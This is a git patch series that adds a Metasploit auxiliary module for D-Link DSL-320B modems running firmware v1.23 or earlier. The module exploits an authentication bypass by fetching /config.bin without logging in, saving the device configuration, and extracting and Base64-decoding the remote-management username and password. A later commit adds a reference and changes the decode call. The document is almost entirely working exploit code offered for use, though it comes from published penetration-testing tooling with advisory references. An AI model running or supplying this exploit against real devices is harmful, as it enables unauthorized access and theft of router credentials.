From 0f2a3fc2d409e0fad96b258d35db6b0d42a068fd Mon Sep 17 00:00:00 2001
From: m-1-k-3 <github@s3cur1ty.de>
Date: Mon, 6 May 2013 14:31:47 +0200
Subject: [PATCH 1/2] dsl320b authentication bypass - password extract

---
 .../http/dlink_dsl320b_password_extractor.rb  | 90 +++++++++++++++++++
 1 file changed, 90 insertions(+)
 create mode 100644 modules/auxiliary/admin/http/dlink_dsl320b_password_extractor.rb

diff --git a/modules/auxiliary/admin/http/dlink_dsl320b_password_extractor.rb b/modules/auxiliary/admin/http/dlink_dsl320b_password_extractor.rb
new file mode 100644
index 0000000000..56476939fb
--- /dev/null
+++ b/modules/auxiliary/admin/http/dlink_dsl320b_password_extractor.rb
@@ -0,0 +1,90 @@
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# web site for more information on licensing and terms of use.
+#   http://metasploit.com/
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Auxiliary
+
+	include Msf::Exploit::Remote::HttpClient
+	include Msf::Auxiliary::Report
+
+	def initialize
+		super(
+			'Name'        => 'DLink DSL 320B Password Extractor',
+			'Description' => %q{
+				This module exploits an authentication bypass vulnerability in DSL 320B =< v1.23.
+				With this vulnerability you are able to extract the password for the remote management.
+				},
+			'References'  =>
+				[
+					[ 'URL', 'http://www.dlink.com/de/de/home-solutions/connect/modems-and-gateways/dsl-320b-adsl-2-ethernet-modem' ],
+					[ 'URL', 'http://www.s3cur1ty.de/m1adv2013-018' ],
+					[ 'EDB', '25252' ]
+				],
+			'Author'      => [
+				'Michael Messner <devnull@s3cur1ty.de>',
+			],
+			'License'     => MSF_LICENSE
+		)
+	end
+
+	def run
+
+		vprint_status("#{rhost}:#{rport} - Trying to access the configuration of the device")
+
+		#download configuration
+		begin
+			res = send_request_cgi({
+				'uri' => '/config.bin',
+				'method' => 'GET',
+				})
+
+			return if res.nil?
+			return if (res.headers['Server'].nil? or res.headers['Server'] !~ /micro_httpd/)
+			return if (res.code == 404)
+
+			if res.body =~ /sysPassword value/ or res.body =~ /sysUserName value/
+				if res.body !~ /sysPassword value/
+					print_line("#{rhost}:#{rport} - Default Configuration of DSL 320B detected - no password section available, try admin/admin")
+				else
+					print_good("#{rhost}:#{rport} - credentials successfully extracted")
+				end
+
+				#store all details as loot -> there is some usefull stuff in the response
+				loot = store_loot("Configuration_dsl320b.txt","text/plain",rhost, res.body)
+				print_good("#{rhost}:#{rport} - Configuration of DSL 320B downloaded to: #{loot}")
+
+				res.body.each_line do |line|
+					if line =~ /\<sysUserName\ value\=\"(.*)\"\/\>/
+						@user = $1
+						next
+					end
+					if line =~ /\<sysPassword\ value\=\"(.*)\"\/\>/
+						pass = $1
+						vprint_good("#{rhost}:#{rport} - user: #{@user}")
+						pass = Base64.decode64(pass)
+						vprint_good("#{rhost}:#{rport} - pass: #{pass}")
+
+					report_auth_info(
+						:host => rhost,
+						:port => rport,
+						:sname => 'http',
+						:user => @user,
+						:pass => pass,
+						:active => true
+						)
+					end
+				end
+			end
+		rescue ::Rex::ConnectionError
+			vprint_error("#{rhost}:#{rport} - Failed to connect to the web server")
+			return
+		end
+
+
+	end
+end

From e3582887cf4b214cf81795176fef41ad57b2ac94 Mon Sep 17 00:00:00 2001
From: m-1-k-3 <github@s3cur1ty.de>
Date: Tue, 7 May 2013 08:28:48 +0200
Subject: [PATCH 2/2] OSVDB, Base64

---
 .../admin/http/dlink_dsl320b_password_extractor.rb          | 6 ++++--
 1 file changed, 4 insertions(+), 2 deletions(-)

diff --git a/modules/auxiliary/admin/http/dlink_dsl320b_password_extractor.rb b/modules/auxiliary/admin/http/dlink_dsl320b_password_extractor.rb
index 56476939fb..1fc48a12a9 100644
--- a/modules/auxiliary/admin/http/dlink_dsl320b_password_extractor.rb
+++ b/modules/auxiliary/admin/http/dlink_dsl320b_password_extractor.rb
@@ -23,7 +23,8 @@ class Metasploit3 < Msf::Auxiliary
 				[
 					[ 'URL', 'http://www.dlink.com/de/de/home-solutions/connect/modems-and-gateways/dsl-320b-adsl-2-ethernet-modem' ],
 					[ 'URL', 'http://www.s3cur1ty.de/m1adv2013-018' ],
-					[ 'EDB', '25252' ]
+					[ 'EDB', '25252' ],
+					[ 'OSVDB', '93013' ]
 				],
 			'Author'      => [
 				'Michael Messner <devnull@s3cur1ty.de>',
@@ -66,7 +67,8 @@ class Metasploit3 < Msf::Auxiliary
 					if line =~ /\<sysPassword\ value\=\"(.*)\"\/\>/
 						pass = $1
 						vprint_good("#{rhost}:#{rport} - user: #{@user}")
-						pass = Base64.decode64(pass)
+						#pass = Base64.decode64(pass)
+						pass = Rex::Text.decode_base64(pass)
 						vprint_good("#{rhost}:#{rport} - pass: #{pass}")
 
 					report_auth_info(